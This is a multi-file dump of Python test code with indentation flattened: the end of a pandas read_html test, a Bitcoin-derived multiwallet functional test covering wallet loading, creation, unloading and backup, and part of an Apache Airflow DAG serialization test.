def read(self, size=None):
data = '' if self.at_end else self.data
self.at_end = True
return data
def seek(self, offset):
self.at_end = False
def seekable(self):
return True
good = MockFile('<table><tr><td>spam<br />eggs</td></tr></table>')
bad = MockFile('<table><tr><td>spam<foobr />eggs</td></tr></table>')
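# `good` parses on the first attempt; `bad` triggers a parse failure, but
# because MockFile is seekable read_html can rewind and retry, so the test
# asserts that both calls ultimately succeed.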
assert self.read_html(good)
assert self.read_html(bad)
@pytest.mark.slow
def test_importcheck_thread_safety(self, datapath):
# see gh-16928
class ErrorThread(threading.Thread):
def run(self):
try:
super(ErrorThread, self).run()
except Exception as e:
self.err = e
else:
self.err = None
# force import check by reinitialising global vars in html.py
reload(pandas.io.html)
filename = datapath('io', 'data', 'valid_markup.html')
helper_thread1 = ErrorThread(target=self.read_html, args=(filename,))
helper_thread2 = ErrorThread(target=self.read_html, args=(filename,))
helper_thread1.start()
helper_thread2.start()
while helper_thread1.is_alive() or helper_thread2.is_alive():
pass
assert None is helper_thread1.err is helper_thread2.err
wallet_multiwallet.py
#!/usr/bin/env python3
# Copyright (c) 2017-2020 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test multiwallet.
Verify that a carpinchod node can load multiple wallet files
"""
from decimal import Decimal
from threading import Thread
import os
import shutil
import stat
import time
from test_framework.authproxy import JSONRPCException
from test_framework.test_framework import CARPINCHOTestFramework
from test_framework.test_node import ErrorMatch
from test_framework.util import (
assert_equal,
assert_raises_rpc_error,
get_rpc_proxy,
)
got_loading_error = False
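# Helper for the concurrent-loading test below: several threads repeatedly
# load and unload the same wallet until one of them observes the expected
# "Wallet already being loading" race error and sets the shared flag.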
def test_load_unload(node, name):
global got_loading_error
for _ in range(10):
if got_loading_error:
return
try:
node.loadwallet(name)
node.unloadwallet(name)
except JSONRPCException as e:
if e.error['code'] == -4 and 'Wallet already being loading' in e.error['message']:
got_loading_error = True
return
class MultiWalletTest(CARPINCHOTestFramework):
def set_test_params(self):
self.setup_clean_chain = True
self.num_nodes = 2
self.rpc_timeout = 120
self.extra_args = [["-nowallet"], []]
def skip_test_if_missing_module(self):
self.skip_if_no_wallet()
def add_options(self, parser):
parser.add_argument(
'--data_wallets_dir',
default=os.path.join(os.path.dirname(os.path.realpath(__file__)), 'data/wallets/'),
help='Test data with wallet directories (default: %(default)s)',
)
def run_test(self):
node = self.nodes[0]
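# Small helpers: data_dir/wallet_dir build paths inside this node's datadir,
# and wallet(name) returns an RPC proxy scoped to the named wallet.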
data_dir = lambda *p: os.path.join(node.datadir, self.chain, *p)
wallet_dir = lambda *p: data_dir('wallets', *p)
wallet = lambda name: node.get_wallet_rpc(name)
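# wallet_file maps a wallet name to its on-disk data file, covering the
# default wallet, directory-based wallets, and plain wallet files.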
def wallet_file(name):
if name == self.default_wallet_name:
return wallet_dir(self.default_wallet_name, self.wallet_data_filename)
if os.path.isdir(wallet_dir(name)):
return wallet_dir(name, "wallet.dat")
return wallet_dir(name)
assert_equal(self.nodes[0].listwalletdir(), { 'wallets': [{ 'name': self.default_wallet_name }] })
# check wallet.dat is created
self.stop_nodes()
assert_equal(os.path.isfile(wallet_dir(self.default_wallet_name, self.wallet_data_filename)), True)
# create symlink to verify wallet directory path can be referenced
# through symlink
os.mkdir(wallet_dir('w7'))
os.symlink('w7', wallet_dir('w7_symlink'))
os.symlink('..', wallet_dir('recursive_dir_symlink'))
os.mkdir(wallet_dir('self_walletdat_symlink'))
os.symlink('wallet.dat', wallet_dir('self_walletdat_symlink/wallet.dat'))
# rename wallet.dat to make sure plain wallet file paths (as opposed to
# directory paths) can be loaded
# create another dummy wallet for use in testing backups later
self.start_node(0)
node.createwallet("empty")
node.createwallet("plain")
node.createwallet("created")
self.stop_nodes()
empty_wallet = os.path.join(self.options.tmpdir, 'empty.dat')
os.rename(wallet_file("empty"), empty_wallet)
shutil.rmtree(wallet_dir("empty"))
empty_created_wallet = os.path.join(self.options.tmpdir, 'empty.created.dat')
os.rename(wallet_dir("created", self.wallet_data_filename), empty_created_wallet)
shutil.rmtree(wallet_dir("created"))
os.rename(wallet_file("plain"), wallet_dir("w8"))
shutil.rmtree(wallet_dir("plain"))
# restart node with a mix of wallet names:
# w1, w2, w3 - to verify new wallets created when non-existing paths specified
# w - to verify wallet name matching works when one wallet path is prefix of another
# sub/w5 - to verify relative wallet path is created correctly
# extern/w6 - to verify absolute wallet path is created correctly
# w7_symlink - to verify symlinked wallet path is initialized correctly
# w8 - to verify existing wallet file is loaded correctly. Not tested for SQLite wallets as this is a deprecated BDB behavior.
# '' - to verify default wallet file is created correctly
to_create = ['w1', 'w2', 'w3', 'w', 'sub/w5', 'w7_symlink']
in_wallet_dir = [w.replace('/', os.path.sep) for w in to_create] # Wallets in the wallet dir
in_wallet_dir.append('w7') # w7 is not loaded or created, but will be listed by listwalletdir because w7_symlink points to it
to_create.append(os.path.join(self.options.tmpdir, 'extern/w6')) # External, not in the wallet dir, so we need to avoid adding it to in_wallet_dir
to_load = [self.default_wallet_name]
if not self.options.descriptors:
to_load.append('w8')
wallet_names = to_create + to_load # Wallet names loaded in the wallet
in_wallet_dir += to_load # The loaded wallets are also in the wallet dir
self.start_node(0)
for wallet_name in to_create:
self.nodes[0].createwallet(wallet_name)
for wallet_name in to_load:
self.nodes[0].loadwallet(wallet_name)
os.mkdir(wallet_dir('no_access'))
os.chmod(wallet_dir('no_access'), 0)
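# With the directory unreadable, listwalletdir should log a scan error (along
# with the recursive-symlink error set up earlier); access is restored in the
# finally block so the test framework can clean the directory up afterwards.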
try:
with self.nodes[0].assert_debug_log(expected_msgs=['Too many levels of symbolic links', 'Error scanning']):
walletlist = self.nodes[0].listwalletdir()['wallets']
finally:
# Need to ensure access is restored for cleanup
os.chmod(wallet_dir('no_access'), stat.S_IRUSR | stat.S_IWUSR | stat.S_IXUSR)
assert_equal(sorted(map(lambda w: w['name'], walletlist)), sorted(in_wallet_dir))
assert_equal(set(node.listwallets()), set(wallet_names))
# should raise rpc error if wallet path can't be created
err_code = -4 if self.options.descriptors else -1
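# Descriptor (SQLite) wallets report this as a wallet error (-4); legacy BDB
# wallets report a misc error (-1).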
assert_raises_rpc_error(err_code, "boost::filesystem::create_directory:", self.nodes[0].createwallet, "w8/bad")
# check that all requested wallets were created
self.stop_node(0)
for wallet_name in wallet_names:
assert_equal(os.path.isfile(wallet_file(wallet_name)), True)
self.nodes[0].assert_start_raises_init_error(['-walletdir=wallets'], 'Error: Specified -walletdir "wallets" does not exist')
self.nodes[0].assert_start_raises_init_error(['-walletdir=wallets'], 'Error: Specified -walletdir "wallets" is a relative path', cwd=data_dir())
self.nodes[0].assert_start_raises_init_error(['-walletdir=debug.log'], 'Error: Specified -walletdir "debug.log" is not a directory', cwd=data_dir())
self.start_node(0, ['-wallet=w1', '-wallet=w1'])
self.stop_node(0, 'Warning: Ignoring duplicate -wallet w1.')
if not self.options.descriptors:
# Only BDB refuses to open duplicate wallet files; SQLite does not have this limitation. While that may be desirable in the future, it is not necessary today.
# should not initialize if one wallet is a copy of another
shutil.copyfile(wallet_dir('w8'), wallet_dir('w8_copy'))
in_wallet_dir.append('w8_copy')
exp_stderr = r"BerkeleyDatabase: Can't open database w8_copy \(duplicates fileid \w+ from w8\)"
self.nodes[0].assert_start_raises_init_error(['-wallet=w8', '-wallet=w8_copy'], exp_stderr, match=ErrorMatch.PARTIAL_REGEX)
# should not initialize if wallet file is a symlink
os.symlink('w8', wallet_dir('w8_symlink'))
self.nodes[0].assert_start_raises_init_error(['-wallet=w8_symlink'], r'Error: Invalid -wallet path \'w8_symlink\'\. .*', match=ErrorMatch.FULL_REGEX)
# should not initialize if the specified walletdir does not exist
self.nodes[0].assert_start_raises_init_error(['-walletdir=bad'], 'Error: Specified -walletdir "bad" does not exist')
# should not initialize if the specified walletdir is not a directory
not_a_dir = wallet_dir('notadir')
open(not_a_dir, 'a', encoding="utf8").close()
self.nodes[0].assert_start_raises_init_error(['-walletdir=' + not_a_dir], 'Error: Specified -walletdir "' + not_a_dir + '" is not a directory')
self.log.info("Do not allow -upgradewallet with multiwallet")
self.nodes[0].assert_start_raises_init_error(['-upgradewallet'], "Error: Error parsing command line arguments: Invalid parameter -upgradewallet")
# if wallets/ doesn't exist, datadir should be the default wallet dir
wallet_dir2 = data_dir('walletdir')
os.rename(wallet_dir(), wallet_dir2)
self.start_node(0)
self.nodes[0].createwallet("w4")
self.nodes[0].createwallet("w5")
assert_equal(set(node.listwallets()), {"w4", "w5"})
w5 = wallet("w5")
node.generatetoaddress(nblocks=1, address=w5.getnewaddress())
# now if wallets/ exists again, but the rootdir is specified as the walletdir, w4 and w5 should still be loaded
os.rename(wallet_dir2, wallet_dir())
self.restart_node(0, ['-nowallet', '-walletdir=' + data_dir()])
self.nodes[0].loadwallet("w4")
self.nodes[0].loadwallet("w5")
assert_equal(set(node.listwallets()), {"w4", "w5"})
w5 = wallet("w5")
w5_info = w5.getwalletinfo()
assert_equal(w5_info['immature_balance'], 50)
competing_wallet_dir = os.path.join(self.options.tmpdir, 'competing_walletdir')
os.mkdir(competing_wallet_dir)
self.restart_node(0, ['-nowallet', '-walletdir=' + competing_wallet_dir])
self.nodes[0].createwallet(self.default_wallet_name)
if self.options.descriptors:
exp_stderr = r"Error: SQLiteDatabase: Unable to obtain an exclusive lock on the database, is it being used by another carpinchod?"
else:
exp_stderr = r"Error: Error initializing wallet database environment \"\S+competing_walletdir\S*\"!"
self.nodes[1].assert_start_raises_init_error(['-walletdir=' + competing_wallet_dir], exp_stderr, match=ErrorMatch.PARTIAL_REGEX)
self.restart_node(0)
for wallet_name in wallet_names:
self.nodes[0].loadwallet(wallet_name)
assert_equal(sorted(map(lambda w: w['name'], self.nodes[0].listwalletdir()['wallets'])), sorted(in_wallet_dir))
wallets = [wallet(w) for w in wallet_names]
wallet_bad = wallet("bad")
# check wallet names and balances
node.generatetoaddress(nblocks=1, address=wallets[0].getnewaddress())
for wallet_name, wallet in zip(wallet_names, wallets):
info = wallet.getwalletinfo()
assert_equal(info['immature_balance'], 50 if wallet is wallets[0] else 0)
assert_equal(info['walletname'], wallet_name)
# accessing invalid wallet fails
assert_raises_rpc_error(-18, "Requested wallet does not exist or is not loaded", wallet_bad.getwalletinfo)
# accessing wallet RPC without using wallet endpoint fails
assert_raises_rpc_error(-19, "Wallet file not specified", node.getwalletinfo)
w1, w2, w3, w4, *_ = wallets
node.generatetoaddress(nblocks=101, address=w1.getnewaddress())
assert_equal(w1.getbalance(), 100)
assert_equal(w2.getbalance(), 0)
assert_equal(w3.getbalance(), 0)
assert_equal(w4.getbalance(), 0)
w1.sendtoaddress(w2.getnewaddress(), 1)
w1.sendtoaddress(w3.getnewaddress(), 2)
w1.sendtoaddress(w4.getnewaddress(), 3)
node.generatetoaddress(nblocks=1, address=w1.getnewaddress())
assert_equal(w2.getbalance(), 1)
assert_equal(w3.getbalance(), 2)
assert_equal(w4.getbalance(), 3)
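# A batch issued through the w1 endpoint can mix node-level and wallet-level
# calls; the wallet call resolves against w1.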
batch = w1.batch([w1.getblockchaininfo.get_request(), w1.getwalletinfo.get_request()])
assert_equal(batch[0]["result"]["chain"], self.chain)
assert_equal(batch[1]["result"]["walletname"], "w1")
self.log.info('Check for per-wallet settxfee call')
assert_equal(w1.getwalletinfo()['paytxfee'], 0)
assert_equal(w2.getwalletinfo()['paytxfee'], 0)
w2.settxfee(0.001)
assert_equal(w1.getwalletinfo()['paytxfee'], 0)
assert_equal(w2.getwalletinfo()['paytxfee'], Decimal('0.00100000'))
self.log.info("Test dynamic wallet loading")
self.restart_node(0, ['-nowallet'])
assert_equal(node.listwallets(), [])
assert_raises_rpc_error(-18, "No wallet is loaded. Load a wallet using loadwallet or create a new one with createwallet. (Note: A default wallet is no longer automatically created)", node.getwalletinfo)
self.log.info("Load first wallet")
loadwallet_name = node.loadwallet(wallet_names[0])
assert_equal(loadwallet_name['name'], wallet_names[0])
assert_equal(node.listwallets(), wallet_names[0:1])
node.getwalletinfo()
w1 = node.get_wallet_rpc(wallet_names[0])
w1.getwalletinfo()
self.log.info("Load second wallet")
loadwallet_name = node.loadwallet(wallet_names[1])
assert_equal(loadwallet_name['name'], wallet_names[1])
assert_equal(node.listwallets(), wallet_names[0:2])
assert_raises_rpc_error(-19, "Wallet file not specified", node.getwalletinfo)
w2 = node.get_wallet_rpc(wallet_names[1])
w2.getwalletinfo()
self.log.info("Concurrent wallet loading")
threads = []
for _ in range(3):
n = node.cli if self.options.usecli else get_rpc_proxy(node.url, 1, timeout=600, coveragedir=node.coverage_dir)
t = Thread(target=test_load_unload, args=(n, wallet_names[2]))
t.start()
threads.append(t)
for t in threads:
t.join()
global got_loading_error
assert_equal(got_loading_error, True)
self.log.info("Load remaining wallets")
for wallet_name in wallet_names[2:]:
loadwallet_name = self.nodes[0].loadwallet(wallet_name)
assert_equal(loadwallet_name['name'], wallet_name)
assert_equal(set(self.nodes[0].listwallets()), set(wallet_names))
# Fail to load if wallet doesn't exist
path = os.path.join(self.options.tmpdir, "node0", "regtest", "wallets", "wallets")
assert_raises_rpc_error(-18, "Wallet file verification failed. Failed to load database path '{}'. Path does not exist.".format(path), self.nodes[0].loadwallet, 'wallets')
# Fail to load duplicate wallets
path = os.path.join(self.options.tmpdir, "node0", "regtest", "wallets", "w1", "wallet.dat")
if self.options.descriptors:
assert_raises_rpc_error(-4, "Wallet file verification failed. SQLiteDatabase: Unable to obtain an exclusive lock on the database, is it being used by another carpinchod?", self.nodes[0].loadwallet, wallet_names[0])
else:
assert_raises_rpc_error(-4, "Wallet file verification failed. Refusing to load database. Data file '{}' is already loaded.".format(path), self.nodes[0].loadwallet, wallet_names[0])
# This tests the default wallet that BDB makes, so SQLite wallet doesn't need to test this
# Fail to load duplicate wallets by different ways (directory and filepath)
path = os.path.join(self.options.tmpdir, "node0", "regtest", "wallets", "wallet.dat")
assert_raises_rpc_error(-4, "Wallet file verification failed. Refusing to load database. Data file '{}' is already loaded.".format(path), self.nodes[0].loadwallet, 'wallet.dat')
# Only BDB refuses to open duplicate wallet files; SQLite does not have this limitation. While that may be desirable in the future, it is not necessary today.
# Fail to load if one wallet is a copy of another
assert_raises_rpc_error(-4, "BerkeleyDatabase: Can't open database w8_copy (duplicates fileid", self.nodes[0].loadwallet, 'w8_copy')
# Fail to load if one wallet is a copy of another, test this twice to make sure that we don't re-introduce #14304
assert_raises_rpc_error(-4, "BerkeleyDatabase: Can't open database w8_copy (duplicates fileid", self.nodes[0].loadwallet, 'w8_copy')
# Fail to load if wallet file is a symlink
assert_raises_rpc_error(-4, "Wallet file verification failed. Invalid -wallet path 'w8_symlink'", self.nodes[0].loadwallet, 'w8_symlink')
# Fail to load if a directory is specified that doesn't contain a wallet
os.mkdir(wallet_dir('empty_wallet_dir'))
path = os.path.join(self.options.tmpdir, "node0", "regtest", "wallets", "empty_wallet_dir")
assert_raises_rpc_error(-18, "Wallet file verification failed. Failed to load database path '{}'. Data is not in recognized format.".format(path), self.nodes[0].loadwallet, 'empty_wallet_dir')
self.log.info("Test dynamic wallet creation.")
# Fail to create a wallet if it already exists.
path = os.path.join(self.options.tmpdir, "node0", "regtest", "wallets", "w2")
assert_raises_rpc_error(-4, "Failed to create database path '{}'. Database already exists.".format(path), self.nodes[0].createwallet, 'w2')
# Successfully create a wallet with a new name
loadwallet_name = self.nodes[0].createwallet('w9')
in_wallet_dir.append('w9')
assert_equal(loadwallet_name['name'], 'w9')
w9 = node.get_wallet_rpc('w9')
assert_equal(w9.getwalletinfo()['walletname'], 'w9')
assert 'w9' in self.nodes[0].listwallets()
# Successfully create a wallet using a full path
new_wallet_dir = os.path.join(self.options.tmpdir, 'new_walletdir')
new_wallet_name = os.path.join(new_wallet_dir, 'w10')
loadwallet_name = self.nodes[0].createwallet(new_wallet_name)
assert_equal(loadwallet_name['name'], new_wallet_name)
w10 = node.get_wallet_rpc(new_wallet_name)
assert_equal(w10.getwalletinfo()['walletname'], new_wallet_name)
assert new_wallet_name in self.nodes[0].listwallets()
self.log.info("Test dynamic wallet unloading")
# Test `unloadwallet` errors
assert_raises_rpc_error(-1, "JSON value is not a string as expected", self.nodes[0].unloadwallet)
assert_raises_rpc_error(-18, "Requested wallet does not exist or is not loaded", self.nodes[0].unloadwallet, "dummy")
assert_raises_rpc_error(-18, "Requested wallet does not exist or is not loaded", node.get_wallet_rpc("dummy").unloadwallet)
assert_raises_rpc_error(-8, "Both the RPC endpoint wallet and wallet_name parameter were provided (only one allowed)", w1.unloadwallet, "w2")
assert_raises_rpc_error(-8, "Both the RPC endpoint wallet and wallet_name parameter were provided (only one allowed)", w1.unloadwallet, "w1")
# Successfully unload the specified wallet name
self.nodes[0].unloadwallet("w1")
assert 'w1' not in self.nodes[0].listwallets()
# Successfully unload the wallet referenced by the request endpoint
# Also ensure unload works during walletpassphrase timeout
w2.encryptwallet('test')
w2.walletpassphrase('test', 1)
w2.unloadwallet()
time.sleep(1.1)
assert 'w2' not in self.nodes[0].listwallets()
# Successfully unload all wallets
for wallet_name in self.nodes[0].listwallets():
self.nodes[0].unloadwallet(wallet_name)
assert_equal(self.nodes[0].listwallets(), [])
assert_raises_rpc_error(-18, "No wallet is loaded. Load a wallet using loadwallet or create a new one with createwallet. (Note: A default wallet is no longer automatically created)", self.nodes[0].getwalletinfo)
# Successfully load a previously unloaded wallet
self.nodes[0].loadwallet('w1')
assert_equal(self.nodes[0].listwallets(), ['w1'])
assert_equal(w1.getwalletinfo()['walletname'], 'w1')
assert_equal(sorted(map(lambda w: w['name'], self.nodes[0].listwalletdir()['wallets'])), sorted(in_wallet_dir))
# Test backing up and restoring wallets
self.log.info("Test wallet backup")
self.restart_node(0, ['-nowallet'])
for wallet_name in wallet_names:
self.nodes[0].loadwallet(wallet_name)
for wallet_name in wallet_names:
rpc = self.nodes[0].get_wallet_rpc(wallet_name)
addr = rpc.getnewaddress()
backup = os.path.join(self.options.tmpdir, 'backup.dat')
if os.path.exists(backup):
os.unlink(backup)
rpc.backupwallet(backup)
self.nodes[0].unloadwallet(wallet_name)
shutil.copyfile(empty_created_wallet if wallet_name == self.default_wallet_name else empty_wallet, wallet_file(wallet_name))
self.nodes[0].loadwallet(wallet_name)
assert_equal(rpc.getaddressinfo(addr)['ismine'], False)
self.nodes[0].unloadwallet(wallet_name)
shutil.copyfile(backup, wallet_file(wallet_name))
self.nodes[0].loadwallet(wallet_name)
assert_equal(rpc.getaddressinfo(addr)['ismine'], True)
# Test .walletlock file is closed
self.start_node(1)
wallet = os.path.join(self.options.tmpdir, 'my_wallet')
self.nodes[0].createwallet(wallet)
if self.options.descriptors:
assert_raises_rpc_error(-4, "Unable to obtain an exclusive lock", self.nodes[1].loadwallet, wallet)
else:
assert_raises_rpc_error(-4, "Error initializing wallet database environment", self.nodes[1].loadwallet, wallet)
self.nodes[0].unloadwallet(wallet)
self.nodes[1].loadwallet(wallet)
if __name__ == '__main__':
MultiWalletTest().main()
test_dag_serialization.py
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""Unit tests for stringified DAGs."""
import copy
import importlib
import importlib.util
import multiprocessing
import os
from datetime import datetime, timedelta
from glob import glob
from unittest import mock
import pendulum
import pytest
from dateutil.relativedelta import FR, relativedelta
from kubernetes.client import models as k8s
from airflow.exceptions import SerializationError
from airflow.hooks.base import BaseHook
from airflow.kubernetes.pod_generator import PodGenerator
from airflow.models import DAG, Connection, DagBag
from airflow.models.baseoperator import BaseOperator, BaseOperatorLink
from airflow.models.xcom import XCom
from airflow.operators.bash import BashOperator
from airflow.security import permissions
from airflow.serialization.json_schema import load_dag_schema_dict
from airflow.serialization.serialized_objects import SerializedBaseOperator, SerializedDAG
from airflow.timetables.simple import NullTimetable, OnceTimetable
from airflow.utils import timezone
from tests.test_utils.mock_operators import CustomOperator, CustomOpLink, GoogleLink
from tests.test_utils.timetables import CustomSerializationTimetable, cron_timetable, delta_timetable
executor_config_pod = k8s.V1Pod(
metadata=k8s.V1ObjectMeta(name="my-name"),
spec=k8s.V1PodSpec(
containers=[
k8s.V1Container(name="base", volume_mounts=[k8s.V1VolumeMount(name="my-vol", mount_path="/vol/")])
]
),
)
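# This pod spec is embedded (via PodGenerator.serialize_pod) as the
# executor_config pod_override of bash_task in the ground-truth dict below.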
serialized_simple_dag_ground_truth = {
"__version": 1,
"dag": {
"default_args": {
"__type": "dict",
"__var": {
"depends_on_past": False,
"retries": 1,
"retry_delay": {"__type": "timedelta", "__var": 300.0},
"max_retry_delay": {"__type": "timedelta", "__var": 600.0},
"sla": {"__type": "timedelta", "__var": 100.0},
},
},
"start_date": 1564617600.0,
'_task_group': {
'_group_id': None,
'prefix_group_id': True,
'children': {'bash_task': ('operator', 'bash_task'), 'custom_task': ('operator', 'custom_task')},
'tooltip': '',
'ui_color': 'CornflowerBlue',
'ui_fgcolor': '#000',
'upstream_group_ids': [],
'downstream_group_ids': [],
'upstream_task_ids': [],
'downstream_task_ids': [],
},
"is_paused_upon_creation": False,
"_dag_id": "simple_dag",
"doc_md": "### DAG Tutorial Documentation",
"fileloc": None,
"tasks": [
{
"task_id": "bash_task",
"owner": "airflow",
"retries": 1,
"retry_delay": 300.0,
"max_retry_delay": 600.0,
"sla": 100.0,
"_downstream_task_ids": [],
"_inlets": [],
"_is_dummy": False,
"_outlets": [],
"ui_color": "#f0ede4",
"ui_fgcolor": "#000",
"template_ext": ['.sh', '.bash'],
"template_fields": ['bash_command', 'env'],
"template_fields_renderers": {'bash_command': 'bash', 'env': 'json'},
"bash_command": "echo {{ task.task_id }}",
'label': 'bash_task',
"_task_type": "BashOperator",
"_task_module": "airflow.operators.bash",
"pool": "default_pool",
"executor_config": {
'__type': 'dict',
'__var': {
"pod_override": {
'__type': 'k8s.V1Pod',
'__var': PodGenerator.serialize_pod(executor_config_pod),
}
},
},
"doc_md": "### Task Tutorial Documentation",
},
{
"task_id": "custom_task",
"retries": 1,
"retry_delay": 300.0,
"max_retry_delay": 600.0,
"sla": 100.0,
"_downstream_task_ids": [],
"_inlets": [],
"_is_dummy": False,
"_outlets": [],
"_operator_extra_links": [{"tests.test_utils.mock_operators.CustomOpLink": {}}],
"ui_color": "#fff",
"ui_fgcolor": "#000",
"template_ext": [],
"template_fields": ['bash_command'],
"template_fields_renderers": {},
"_task_type": "CustomOperator",
"_task_module": "tests.test_utils.mock_operators",
"pool": "default_pool",
'label': 'custom_task',
},
],
"schedule_interval": {"__type": "timedelta", "__var": 86400.0},
"timezone": "UTC",
"_access_control": {
"__type": "dict",
"__var": {
"test_role": {
"__type": "set",
"__var": [permissions.ACTION_CAN_READ, permissions.ACTION_CAN_EDIT],
}
},
},
"edge_info": {},
"dag_dependencies": [],
},
}
ROOT_FOLDER = os.path.realpath(
os.path.join(os.path.dirname(os.path.realpath(__file__)), os.pardir, os.pardir)
)
CUSTOM_TIMETABLE_SERIALIZED = {
"__type": "tests.test_utils.timetables.CustomSerializationTimetable",
"__var": {"value": "foo"},
}
def make_example_dags(module_path):
"""Loads DAGs from a module for test."""
dagbag = DagBag(module_path)
return dagbag.dags
def make_simple_dag():
"""Make very simple DAG to verify serialization result."""
with DAG(
dag_id='simple_dag',
default_args={
"retries": 1,
"retry_delay": timedelta(minutes=5),
"max_retry_delay": timedelta(minutes=10),
"depends_on_past": False,
"sla": timedelta(seconds=100),
},
start_date=datetime(2019, 8, 1),
is_paused_upon_creation=False,
access_control={"test_role": {permissions.ACTION_CAN_READ, permissions.ACTION_CAN_EDIT}},
doc_md="### DAG Tutorial Documentation",
) as dag:
CustomOperator(task_id='custom_task')
BashOperator(
task_id='bash_task',
bash_command='echo {{ task.task_id }}',
owner='airflow',
executor_config={"pod_override": executor_config_pod},
doc_md="### Task Tutorial Documentation",
)
return {'simple_dag': dag}
def make_user_defined_macro_filter_dag():
"""Make DAGs with user defined macros and filters using locally defined methods.
For Webserver, we do not include ``user_defined_macros`` & ``user_defined_filters``.
The examples here test:
(1) functions can be successfully displayed on UI;
(2) templates with function macros have been rendered before serialization.
"""
def compute_next_execution_date(dag, execution_date):
return dag.following_schedule(execution_date)
default_args = {'start_date': datetime(2019, 7, 10)}
dag = DAG(
'user_defined_macro_filter_dag',
default_args=default_args,
user_defined_macros={
'next_execution_date': compute_next_execution_date,
},
user_defined_filters={'hello': lambda name: f'Hello {name}'},
catchup=False,
)
BashOperator(
task_id='echo',
bash_command='echo "{{ next_execution_date(dag, execution_date) }}"',
dag=dag,
)
return {dag.dag_id: dag}
def collect_dags(dag_folder=None):
"""Collects DAGs to test."""
dags = {}
dags.update(make_simple_dag())
dags.update(make_user_defined_macro_filter_dag())
if dag_folder:
if isinstance(dag_folder, (list, tuple)):
patterns = dag_folder
else:
patterns = [dag_folder]
else:
patterns = [
"airflow/example_dags",
"airflow/providers/*/example_dags",
"airflow/providers/*/*/example_dags",
]
for pattern in patterns:
for directory in glob(f"{ROOT_FOLDER}/{pattern}"):
dags.update(make_example_dags(directory))
# Filter subdags as they are stored in same row in Serialized Dag table
dags = {dag_id: dag for dag_id, dag in dags.items() if not dag.is_subdag}
return dags
def get_timetable_based_simple_dag(timetable):
"""Create a simple_dag variant that uses timetable instead of schedule_interval."""
dag = collect_dags(["airflow/example_dags"])["simple_dag"]
dag.timetable = timetable
dag.schedule_interval = timetable.summary
return dag
def serialize_subprocess(queue, dag_folder):
"""Validate pickle in a subprocess."""
dags = collect_dags(dag_folder)
for dag in dags.values():
queue.put(SerializedDAG.to_json(dag))
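# A trailing None acts as a sentinel so the parent process knows when to
# stop reading from the queue.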
queue.put(None)
@pytest.fixture()
def timetable_plugin(monkeypatch):
"""Patch plugins manager to always and only return our custom timetable."""
from airflow import plugins_manager
monkeypatch.setattr(plugins_manager, "initialize_timetables_plugins", lambda: None)
monkeypatch.setattr(
plugins_manager,
"timetable_classes",
{"tests.test_utils.timetables.CustomSerializationTimetable": CustomSerializationTimetable},
)
class TestStringifiedDAGs:
"""Unit tests for stringified DAGs."""
def setup_method(self):
self.backup_base_hook_get_connection = BaseHook.get_connection
BaseHook.get_connection = mock.Mock(
return_value=Connection(
extra=(
'{'
'"project_id": "mock", '
'"location": "mock", '
'"instance": "mock", '
'"database_type": "postgres", '
'"use_proxy": "False", '
'"use_ssl": "False"'
'}'
)
)
)
self.maxDiff = None
def teardown_method(self):
BaseHook.get_connection = self.backup_base_hook_get_connection
def test_serialization(self):
"""Serialization and deserialization should work for every DAG and Operator."""
dags = collect_dags()
serialized_dags = {}
for _, v in dags.items():
dag = SerializedDAG.to_dict(v)
SerializedDAG.validate_schema(dag)
serialized_dags[v.dag_id] = dag
# Compares with the ground truth of JSON string.
self.validate_serialized_dag(serialized_dags['simple_dag'], serialized_simple_dag_ground_truth)
@pytest.mark.parametrize(
"timetable, serialized_timetable",
[
(
cron_timetable("0 0 * * *"),
{
"__type": "airflow.timetables.interval.CronDataIntervalTimetable",
"__var": {"expression": "0 0 * * *", "timezone": "UTC"},
},
),
(
CustomSerializationTimetable("foo"),
CUSTOM_TIMETABLE_SERIALIZED,
),
],
)
@pytest.mark.usefixtures("timetable_plugin")
def test_dag_serialization_to_timetable(self, timetable, serialized_timetable):
"""Verify a timetable-backed schedule_interval is excluded in serialization."""
dag = get_timetable_based_simple_dag(timetable)
serialized_dag = SerializedDAG.to_dict(dag)
SerializedDAG.validate_schema(serialized_dag)
expected = copy.deepcopy(serialized_simple_dag_ground_truth)
del expected["dag"]["schedule_interval"]
expected["dag"]["timetable"] = serialized_timetable
self.validate_serialized_dag(serialized_dag, expected)
def test_dag_serialization_unregistered_custom_timetable(self):
"""Verify serialization fails without timetable registration."""
dag = get_timetable_based_simple_dag(CustomSerializationTimetable("bar"))
with pytest.raises(SerializationError) as ctx:
SerializedDAG.to_dict(dag)
message = (
"Failed to serialize DAG 'simple_dag': Timetable class "
"'tests.test_utils.timetables.CustomSerializationTimetable' "
"is not registered"
)
assert str(ctx.value) == message
def validate_serialized_dag(self, json_dag, ground_truth_dag):
"""Verify serialized DAGs match the ground truth."""
assert json_dag['dag']['fileloc'].split('/')[-1] == 'test_dag_serialization.py'
json_dag['dag']['fileloc'] = None
def sorted_serialized_dag(dag_dict: dict):
"""
Sorts the "tasks" list and "access_control" permissions in the
serialised dag python dictionary. This is needed as the order of
items should not matter but assertEqual would fail if the order of
items changes in the dag dictionary
"""
dag_dict["dag"]["tasks"] = sorted(dag_dict["dag"]["tasks"], key=lambda x: sorted(x.keys()))
dag_dict["dag"]["_access_control"]["__var"]["test_role"]["__var"] = sorted(
dag_dict["dag"]["_access_control"]["__var"]["test_role"]["__var"]
)
return dag_dict
assert sorted_serialized_dag(ground_truth_dag) == sorted_serialized_dag(json_dag)
def test_deserialization_across_process(self):
"""A serialized DAG can be deserialized in another process."""
# Since we need to parse the dags twice here (once in the subprocess,
# and once here to get a DAG to compare to) we don't want to load all
# dags.
queue = multiprocessing.Queue()
proc = multiprocessing.Process(target=serialize_subprocess, args=(queue, "airflow/example_dags"))
proc.daemon = True
proc.start()
stringified_dags = {}
while True:
v = queue.get()
if v is None:
break
dag = SerializedDAG.from_json(v)
assert isinstance(dag, DAG)
stringified_dags[dag.dag_id] = dag
dags = collect_dags("airflow/example_dags")
assert set(stringified_dags.keys()) == set(dags.keys())
